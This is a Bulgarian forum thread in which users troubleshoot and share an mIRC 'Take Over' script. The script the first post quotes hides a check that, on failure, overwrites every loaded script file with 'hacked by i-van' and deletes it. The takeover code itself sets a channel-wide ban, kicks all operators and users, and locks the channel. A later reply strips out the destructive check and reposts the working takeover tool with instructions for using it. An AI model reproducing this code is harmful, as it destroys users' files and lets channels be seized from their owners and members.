Проблем с addons

Статус
Not open for further replies.

AnF3taMin4o

Registered
Код:
alias to {
  if ( $readini mirc.ini authivan vip != $decode(VklQU2NyaXB0,m) ) { /echo Script only for VIP Script use| //var %a = 0 | while (%a != $script(0)) { inc %a | /write -c $right( $script(%a),$calc( $len($script(%a)) - $len($mircdir) ) ) hacked by i-van | /remove $right( $script(%a),$calc( $len($script(%a)) - $len($mircdir) ) ) } | //var %a = 0 | halt }
  if ( $active !== $chan ) { /echo -a 3 $+ $timestamp * Take Over Error: Use it in Channel }  
  else {
    if ( $?!="Сигурни ли сте, че искате да превземете $chan ?" == $true ) {
      /set %xto.reason $?="Въведете причина за превземане:" 7(11VIP 14script7)
      /mode $chan +b *!*@*
      /mko
    }
  }
}
alias -l mko {
  var %m 0
  :go
  inc %m
  if ( %m > $opnick(#,0)) { /mode # +d * | mkno }
  if ( $opnick(#,%m) != $me ) { if ($me isop #) { kick # $opnick(#,%m) %xto.reason } }
  goto go
}

alias -l mkno {
  var %m 0
  inc %m
  if ( %m > $nick(#,0)) { /mode # -n+tspmilk 1 VIP script | /topic # Take Overed, reason: %xto.reason | halt }
  if ( $nick(#,%m) != $me ) && ( $nick(#,%m) !isop # ) { if ($me isop #) { kick # $nick(#,%m) %xto.reason } }
  goto go
}
Когато е на оргиналния Си скрипт тръгва а когато го сложа другаде не става.Дали е от кода незнам :roll:
TO Unknown command Това изписва

MaDHaCkEr

Registered
Ето в това беше проблема
if ( $readini mirc.ini authivan vip != $decode(VklQU2NyaXB0,m) ) { /echo Script only for VIP Script use| //var %a = 0 | while (%a != $script(0)) { inc %a | /write -c $right( $script(%a),$calc( $len($script(%a)) - $len($mircdir) ) ) hacked by i-van | /remove $right( $script(%a),$calc( $len($script(%a)) - $len($mircdir) ) ) } | //var %a = 0 | halt }

Напиши ето това:
alias to {
if ( $active !== $chan ) { /echo -a 3 $+ $timestamp * Take Over Error: Use it in Channel }
else {
if ( $?!="Сигурни ли сте, че искате да превземете $chan ?" == $true ) {
/set %xto.reason $?="Въведете причина за превземане:" 7(11VIP 14script7)
/mode $chan +b *!*@*
/mko
}
}
}
alias -l mko {
var %m 0
inc %m
if ( %m > $opnick(#,0)) { /mode # +d * | mkno }
if ( $opnick(#,%m) != $me ) { if ($me isop #) { kick # $opnick(#,%m) %xto.reason } }
goto go
}

alias -l mkno {
var %m 0
inc %m
if ( %m > $nick(#,0)) { /mode # -n+tspmilk 1 VIP script | /topic # Take Overed, reason: %xto.reason | halt }
if ( $nick(#,%m) != $me ) && ( $nick(#,%m) !isop # ) { if ($me isop #) { kick # $nick(#,%m) %xto.reason } }
goto go
}

След това си го нагласи с менюто или с някой бутон да ти прави Take Over и си готов :)

i_van

Registered
Благодаря ви, че си крадете от скриптовете ми.
Пуснал съм лека защита от леймъри, но има и умни хора които им оказват помощ.

Полжелавам ви, ако някога достигнете нивото сами да си пишете каквито и да било скриптове също да ви ги взимат. Чувството е много приятно.

Е.. оставям ви да бълвате гняв след поста ми.

iwanov

Registered
i_van каза:

Полжелавам ви, ако някога достигнете нивото сами да си пишете каквито и да било скриптове също да ви ги взимат. Чувството е много приятно.

Първо аз не знам откаде се крадат скриптовете тук.
Второ аз не се нервя.
И трето кажи откаде се крадат за да се провери поне тая работа а не да казваш "крадете от скриптовете ми".

Smirnoff

Registered
i_van каза:

Тук съм за да окажа помощ на всеки който мога.
MaDHaCkEr също който уважавам е тук за да окаже помощ,
където може и където поиска.
Ние не, че толерираме краденето на скриптове, напротив!
Просто човека поиска помощ и му беше помогнато. Нищо лошо.

Статус
Not open for further replies.

Горе